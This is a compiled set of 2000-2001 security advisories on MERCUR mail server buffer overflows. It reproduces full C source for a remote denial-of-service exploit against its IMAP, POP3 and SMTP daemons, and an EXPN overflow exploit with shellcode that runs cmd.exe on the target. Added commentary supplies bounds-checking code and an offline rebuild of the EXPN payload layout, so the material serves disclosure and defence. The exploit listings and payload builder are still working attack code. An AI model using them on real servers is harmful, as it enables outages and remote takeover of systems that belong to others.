Title
15/3/2000 Mercur POP3 / IMAP server vulnerable to DoS

Summary
UssrLabs found that the Mercur POP3 and IMAP Server (<http://www.atrium-software.com/mercur/mercur_e.html>) is vulnerable to a Denial of Service attack. The attack is possible due to improper bounds checking: an overlong argument to the POP3 USER command, or an overlong IMAP command line, crashes the server.

Details
Vulnerable systems:
 MERCUR Mailserver 3.2
 MERCUR POP3-Server (v3.20.01) for Windows NT
 MERCUR IMAP4-Server (v3.20.01) for Windows NT

Example:
 $ telnet example.com 110
 Trying example.com...
 Connected to example.com.
 Escape character is '^]'.
 +OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:30:39 -0300
 user [buffer]

Where [buffer] is approximately 2000 characters.

 $ telnet example.com 143
 Trying example.com...
 Connected to example.com.
 Escape character is '^]'.
 * OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000 03:34:09 -0300
 [buffer]

Where [buffer] is approximately 3000 characters.

Exploit:
Binary version of the POP3 DoS: <http://www.ussrback.com/mercur/domrc32p.exe>
Binary version of the IMAP DoS: <http://www.ussrback.com/mercur/domrc32i.exe>
Source code: <http://www.ussrback.com/mercur/merc32ds.zip>

Additional information
The information was provided by Ussr Labs <mailto:labs at USSRBACK.COM>.

Title
14/6/2000 Mercur Mail server large buffer exploit code has been released

Summary
We already reported the vulnerability in the Mercur Mail server (<http://www.securiteam.com/exploits/Mercur_POP3___IMAP_server_vulnerable_to_DoS.html>, Mercur POP3 / IMAP server vulnerable to DoS). Exploit source code has now been released to test for this vulnerability.
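Both advisories come down to a command line that is copied without a bound. The reader below is an added example (it is not Mercur code and not the UssrLabs or |[TDP]| exploit) of the check a server needs: a line is accepted only if its CRLF arrives within the protocol's limit and it fits the destination buffer, otherwise nothing is copied and the input is skipped to the next CRLF. build_probe() reproduces the three payloads the |[TDP]| exploit listed in the next advisory sends, so they can be fed to the reader offline. The POP3 limit of 255 octets (RFC 2449) and the SMTP limit of 512 (RFC 5321) are the standards'; the IMAP4 limit of 8192 is my assumption for the example, and "@example.com" stands in for the exploit's redacted domain. Note the IMAP result: the 3015-byte probe is within that limit and is handled safely, because the safety comes from the bounded copy, not from the cap.

```c
/* Bounded command-line reading for POP3, IMAP4 and SMTP: the check the Mercur
 * daemons lacked. Added example; not Mercur code and not the exploit authors'.
 * Limits: POP3 255 and SMTP 512 octets including CRLF (RFC 2449, RFC 5321);
 * the IMAP4 value of 8192 is an assumption for this example (RFC 2683 asks
 * servers to accept at least 8000). build_probe() mirrors the |[TDP]| exploit's
 * three payloads, with "@example.com" in place of the redacted domain. */
#include <stdio.h>
#include <string.h>

enum proto { PROTO_IMAP = 0, PROTO_POP3 = 1, PROTO_SMTP = 2 };  /* the exploit's [type] values */
enum line_status { LINE_OK = 0, LINE_INCOMPLETE = 1, LINE_TOO_LONG = 2 };
#define MAX_LINE_ANY 8192

static size_t max_line_for(enum proto p)
{
    return p == PROTO_POP3 ? 255 : p == PROTO_SMTP ? 512 : MAX_LINE_ANY;
}

/* Offset of the first CRLF in buf[0..len), or len if there is none. */
static size_t find_crlf(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 1 < len; i++)
        if (buf[i] == '\r' && buf[i + 1] == '\n') return i;
    return len;
}

/* Copy one command line (CRLF stripped) into out[outsz], but only if it ends
 * within max_line bytes and fits out. On LINE_TOO_LONG nothing is copied and
 * *consumed tells the caller how much input to drop (through the next CRLF). */
enum line_status read_bounded_line(const unsigned char *in, size_t inlen, size_t max_line,
                                   char *out, size_t outsz, size_t *consumed)
{
    size_t window = inlen < max_line ? inlen : max_line;
    size_t eol = find_crlf(in, window);

    if (eol + 2 <= window) {               /* terminator seen inside the limit */
        *consumed = eol + 2;
        if (eol >= outsz) return LINE_TOO_LONG;   /* refuse rather than truncate */
        memcpy(out, in, eol);
        out[eol] = '\0';
        return LINE_OK;
    }
    if (inlen < max_line) {                /* a CRLF may still arrive within the limit */
        *consumed = 0;
        return LINE_INCOMPLETE;
    }
    eol = find_crlf(in, inlen);            /* over the limit: resync at the next CRLF */
    *consumed = eol < inlen ? eol + 2 : inlen;
    return LINE_TOO_LONG;
}

/* Read one command for protocol p and write the reply. The verb is not
 * dispatched: the bound, not the command, is the point. */
enum line_status serve_line(enum proto p, const unsigned char *in, size_t inlen,
                            char *reply, size_t replysz)
{
    static const char *too_long[] = { "* BAD line too long\r\n",
                                      "-ERR line too long\r\n", "500 line too long\r\n" };
    char line[MAX_LINE_ANY + 1];
    size_t used;
    enum line_status st = read_bounded_line(in, inlen, max_line_for(p), line, sizeof line, &used);

    if (st == LINE_TOO_LONG)        snprintf(reply, replysz, "%s", too_long[p]);
    else if (st == LINE_INCOMPLETE) reply[0] = '\0';
    else if (p == PROTO_IMAP)       /* IMAP replies carry the client's tag */
        snprintf(reply, replysz, "%.*s OK\r\n", (int)strcspn(line, " "), line);
    else
        snprintf(reply, replysz, "%s\r\n", p == PROTO_POP3 ? "+OK" : "250 OK");
    return st;
}

/* The exploit's payloads: 2046 'X' (0x58) for POP3, 2998 for the other two. */
size_t build_probe(enum proto p, unsigned char *out, size_t outsz)
{
    char filler[3000];
    size_t fill = p == PROTO_POP3 ? 2046 : 2998;
    int n;
    memset(filler, 'X', fill);
    filler[fill] = '\0';
    if (p == PROTO_POP3)      n = snprintf((char *)out, outsz, "USER %s\r\n\r\n\r\n", filler);
    else if (p == PROTO_SMTP) n = snprintf((char *)out, outsz, "MAIL FROM: %s@example.com\r\n\r\n\r\n", filler);
    else                      n = snprintf((char *)out, outsz, "1000 LOGIN %s\r\n\r\n\r\n", filler);
    return (n < 0 || (size_t)n >= outsz) ? 0 : (size_t)n;
}

size_t probe_length(enum proto p) { unsigned char b[4096]; return build_probe(p, b, sizeof b); }

/* 1 if feeding the exploit's payload for p yields exactly this status and reply. */
int probe_check(enum proto p, enum line_status want, const char *reply)
{
    unsigned char b[4096]; char r[64];
    enum line_status st = serve_line(p, b, build_probe(p, b, sizeof b), r, sizeof r);
    return st == want && strcmp(r, reply) == 0;
}

/* Same check for an arbitrary command string. */
int command_check(enum proto p, const char *cmd, enum line_status want, const char *reply)
{
    char r[64];
    enum line_status st = serve_line(p, (const unsigned char *)cmd, strlen(cmd), r, sizeof r);
    return st == want && strcmp(r, reply) == 0;
}

int main(void)
{
    printf("POP3 probe: %zu bytes, rejected: %d\n", probe_length(PROTO_POP3),
           probe_check(PROTO_POP3, LINE_TOO_LONG, "-ERR line too long\r\n"));
    printf("IMAP probe: %zu bytes, accepted within limit: %d\n", probe_length(PROTO_IMAP),
           probe_check(PROTO_IMAP, LINE_OK, "1000 OK\r\n"));
    return 0;
}
```

On LINE_TOO_LONG the caller must actually discard *consumed bytes (or close the connection); a server that rejects the line but leaves the bytes queued will just re-read the same overlong input.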
Details
Vulnerable systems:
 MERCUR Mailserver 3.2

Exploit:

/*
 * Remote Denial of Service for Mercur 3.2
 *
 * (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@xxxxxxxxxx>
 *
 * This code shows a Mercur 3.2 vulnerability in which any remote
 * user can cause server shutdown. Previous Mercur versions may be
 * affected by this vulnerability.
 *
 * Greetings to all the other members and all my friends :)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy, strlen: missing from the original listing */
#include <strings.h>     /* bzero */
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void usage (char *progname)
{
  fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
  fprintf (stderr, " Type:\n");
  fprintf (stderr, "  0 - IMAP4 (Default)\n");
  fprintf (stderr, "  1 - POP3\n");
  fprintf (stderr, "  2 - SMTP\n\n");
  exit (1);
}

int main (int argc, char **argv)
{
  char *ptr, buffer[3000], remotedos[3100];
  int sock, type;
  struct sockaddr_in sin;
  struct hostent *he;

  fprintf (stderr, "\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
  if (argc < 2)
    usage (argv[0]);

  type = 0;
  if (argc > 2)
    type = atol (argv[2]);

  /* Filler: 2046 'X' (0x58) for POP3, 2998 for IMAP4 and SMTP */
  ptr = buffer;
  switch (type) {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
  }

  /* Wrap the filler in the command each daemon fails to bound */
  bzero (remotedos, sizeof (remotedos));
  switch (type) {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos), "MAIL FROM: %s@xxxxxxxxxxxxxx\r\n\r\n\r\n", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN %s\r\n\r\n\r\n", buffer);
      break;
  }

  if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
    perror ("socket()");
    return -1;
  }

  /* Resolve the target; the original cast h_addr to unsigned long and
   * compared inet_addr() against NULL, which is fixed here without
   * changing what is sent */
  memset (&sin, 0, sizeof (sin));
  if ((he = gethostbyname (argv[1])) != NULL) {
    memcpy (&sin.sin_addr, he->h_addr, sizeof (sin.sin_addr));
  } else if ((sin.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE) {
    perror ("inet_addr()");
    return -1;
  }
  sin.sin_family = AF_INET;
  switch (type) {
    case 1:
      sin.sin_port = htons (110);
      break;
    case 2:
      sin.sin_port = htons (25);
      break;
    default:
      sin.sin_port = htons (143);
      break;
  }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0) {
    perror ("connect()");
    return -1;
  }

  switch (type) {
    case 1:
      fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
      break;
    case 2:
      fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
      break;
    default:
      fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
      break;
  }

  if (write (sock, remotedos, strlen (remotedos)) < (ssize_t) strlen (remotedos)) {
    perror ("write()");
    return -1;
  }

  sleep (4);
  fprintf (stderr, "Bye Bye baby!...\n\n");

  if (close (sock) < 0) {
    perror ("close()");
    return -1;
  }
  return (0);
}

Additional information
The information has been provided by |[TDP]| <mailto:tdp at PSYNET.NET>.

Title
1/3/2001 MERCUR Mailserver Buffer Overflow Vulnerability (EXPN)

Summary
MERCUR (<http://www.atrium-software.com/mercur/mercur_e.html>) offers the necessary features to provide an efficient and effective communications medium. A security vulnerability in the product allows remote attackers to crash it and, with a crafted EXPN argument, to execute arbitrary code.

Details
Vulnerable systems:
 MERCUR Mailserver version 3.3

Example:
 < 220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at Thu, 15 Feb 2001 03:55:34 -0800
 > EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Connection to host lost.
Exploit:
This exploit runs an instance of cmd.exe on the target host:

/*
  MERCUR Mailserver 3.3 Remote Buffer Overflow
  Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
  Martin Rakhmanoff martin@xxxxxxxxxxxxx
*/
#include <winsock2.h>
#include <stdio.h>
#include <string.h>                   /* memset, memcpy: not in the original listing */
#pragma comment(lib, "ws2_32.lib")    /* link Winsock under MSVC: not in the original listing */

/* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
char shellcode[] =
  "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\xD0\x33\xDB\x53"
  "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\x78\x65\x0D\x0A";

/* In SoftICE bpx 001b:00418b65 - here eip is restored with overwritten value... */
int main(int argc, char *argv[])
{
  int i;
  char sploit[512];
  char buffer[512];
  WSADATA wsaData;
  SOCKET sock;
  struct sockaddr_in server;
  struct hostent *hp;

  WSAStartup(0x202, &wsaData);
  hp = gethostbyname("arena");            /* target host name is hard-coded in the original */
  if (hp == NULL) {
    fprintf(stderr, "gethostbyname() failed\n");
    WSACleanup();
    return 1;
  }
  memset(&server, 0, sizeof(server));
  memcpy(&(server.sin_addr), hp->h_addr, hp->h_length);
  server.sin_family = hp->h_addrtype;
  server.sin_port = htons(25);
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock, (struct sockaddr *)&server, sizeof(server));

  /* "EXPN " followed by 132 bytes of filler */
  sploit[0] = 'E';
  sploit[1] = 'X';
  sploit[2] = 'P';
  sploit[3] = 'N';
  sploit[4] = 0x20;
  for (i = 5; i < 137; i++) {
    sploit[i] = 0x41;
  }

  // Return address
  //77E87D8B
  // (the four bytes below read little-endian as 0x77E8898B)
  sploit[137] = 0x8B;
  sploit[138] = 0x89;
  sploit[139] = 0xE8;
  sploit[140] = 0x77;

  /* shellcode at offset 141 */
  for (i = 0; i < sizeof(shellcode); i++) {
    sploit[i + 141] = shellcode[i];
  }

  recv(sock, buffer, 512, 0);             /* read the banner */
  send(sock, sploit, 173, 0);             /* 5 + 132 + 4 + 32 bytes; the shellcode's trailing NUL is not sent */
  closesocket(sock);
  WSACleanup();
  return 0;
}

Vendor Status:
The vendor was notified and is working on a solution.

Additional information
The information has been provided by Martin Rakhmanoff <mailto:martin at DIRECT.SPB.RU>.

--> Shaka (Rudy), Helpc list owner <shaka.rudy@xxxxxxxxx>
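The numbers in the exploit above fix the frame layout of the vulnerable EXPN handler: 5 bytes of "EXPN ", 132 bytes of filler, the overwritten return address at offset 137 and the 32-byte shellcode at 141, 173 bytes on the wire. The block below is an added example, not Martin Rakhmanoff's code; it rebuilds that payload from those constants, reads the return address back the way the victim's x86 would (the bytes 8B 89 E8 77 are 0x77E8898B little-endian, while the listing's comment says 77E87D8B), checks that the shellcode carries no NUL, CR or LF that an SMTP line reader would stop at, and shows the handler-side bound that was missing. It never opens a socket. The opcode reading in the comments is mine; the page does not say which functions the two absolute addresses in the shellcode call, and the 64-byte mailbox-name buffer is an assumed size. Note that the 173-byte line is well inside SMTP's 512-octet command limit, so a line-length cap alone would not have stopped this; the copy into the handler's buffer has to be bounded.

```c
/* Layout of the EXPN overflow payload, rebuilt from the listing above as an
 * added example; not Martin Rakhmanoff's code, and no socket is touched.
 * From the listing: "EXPN " + 132 filler bytes put the overwritten return
 * address at offset 137, the 32-byte shellcode at 141, 173 bytes sent. The
 * address bytes 8B 89 E8 77 read little-endian as 0x77E8898B. The opcode
 * reading below is my inference; the page does not name the functions that
 * the two absolute addresses in the shellcode call. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EXPN_PREFIX        "EXPN "
#define EXPN_FILLER_LEN    132
#define RET_OFFSET         (sizeof(EXPN_PREFIX) - 1 + EXPN_FILLER_LEN)  /* 137 */
#define SHELLCODE_OFFSET   (RET_OFFSET + 4)                             /* 141 */
#define RET_ADDR_WIN2K_SP1 0x77E8898Bu   /* the listing's bytes, tested on Win2K AS SP1 */

/* The exploit's x86 shellcode, byte for byte:
 *   8B C4             mov  eax, esp
 *   83 C0 17          add  eax, 0x17       ; eax -> "cmd.exe" at the end of the buffer
 *   50                push eax             ; the string as the only argument
 *   B8 0E B5 E9 77    mov  eax, 0x77E9B50E ; absolute address, same range as the return address
 *   FF D0             call eax
 *   33 DB / 53        xor ebx, ebx / push ebx ; argument 0
 *   B8 2D F3 E8 77    mov  eax, 0x77E8F32D ; second absolute address
 *   FF D0             call eax
 *   63 6D 64 2E 65 78 65 0D 0A   "cmd.exe\r\n"; the CRLF also terminates the SMTP line */
static const unsigned char shellcode[32] = {
    0x8B,0xC4,0x83,0xC0,0x17,0x50,0xB8,0x0E,0xB5,0xE9,0x77,0xFF,0xD0,0x33,0xDB,0x53,
    0xB8,0x2D,0xF3,0xE8,0x77,0xFF,0xD0,0x63,0x6D,0x64,0x2E,0x65,0x78,0x65,0x0D,0x0A };

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xFF; p[1] = (v >> 8) & 0xFF; p[2] = (v >> 16) & 0xFF; p[3] = v >> 24;
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* prefix + filler + return address + shellcode; returns 173 for this layout,
 * or 0 if out is too small. */
size_t build_expn_payload(unsigned char *out, size_t outsz, uint32_t ret_addr)
{
    size_t n = SHELLCODE_OFFSET + sizeof shellcode;
    if (outsz < n) return 0;
    memcpy(out, EXPN_PREFIX, sizeof(EXPN_PREFIX) - 1);
    memset(out + sizeof(EXPN_PREFIX) - 1, 'A', EXPN_FILLER_LEN);
    put_le32(out + RET_OFFSET, ret_addr);
    memcpy(out + SHELLCODE_OFFSET, shellcode, sizeof shellcode);
    return n;
}

/* Shellcode inside an SMTP command line must contain no NUL, CR or LF before
 * its final CRLF, or the server's line reader cuts it short. */
int shellcode_is_line_safe(const unsigned char *sc, size_t len)
{
    size_t i;
    if (len < 2 || sc[len - 2] != '\r' || sc[len - 1] != '\n') return 0;
    for (i = 0; i + 2 < len; i++)
        if (sc[i] == 0 || sc[i] == '\r' || sc[i] == '\n') return 0;
    return 1;
}

/* The bound the vulnerable handler lacked: copy the EXPN argument only if it
 * fits name[namesz], refusing (not truncating) otherwise. 1 on success. */
int expn_copy_argument(const unsigned char *line, size_t len, char *name, size_t namesz)
{
    size_t end = len, arg;
    if (len < 5 || memcmp(line, EXPN_PREFIX, 5) != 0) return 0;
    while (end > 5 && (line[end - 1] == '\r' || line[end - 1] == '\n')) end--;
    arg = end - 5;
    if (arg >= namesz) return 0;
    memcpy(name, line + 5, arg);
    name[arg] = '\0';
    return 1;
}

/* Wrappers so the layout can be checked without a socket. */
size_t payload_length(void) { unsigned char b[256]; return build_expn_payload(b, sizeof b, RET_ADDR_WIN2K_SP1); }

uint32_t payload_ret(void)   /* the address the victim's x86 loads from the smashed frame */
{
    unsigned char b[256];
    build_expn_payload(b, sizeof b, RET_ADDR_WIN2K_SP1);
    return get_le32(b + RET_OFFSET);
}

int payload_rejected_by_bound(void)   /* 64-byte mailbox name buffer: assumed size */
{
    unsigned char b[256]; char name[64];
    size_t n = build_expn_payload(b, sizeof b, RET_ADDR_WIN2K_SP1);
    return expn_copy_argument(b, n, name, sizeof name) == 0;
}

int expn_argument_fits(const char *line)
{
    char name[64];
    return expn_copy_argument((const unsigned char *)line, strlen(line), name, sizeof name);
}

int main(void)
{
    printf("%zu bytes: ret 0x%08X at %zu, shellcode at %zu, line-safe %d, rejected by bound %d\n",
           payload_length(), payload_ret(), (size_t)RET_OFFSET, (size_t)SHELLCODE_OFFSET,
           shellcode_is_line_safe(shellcode, sizeof shellcode), payload_rejected_by_bound());
    return 0;
}
```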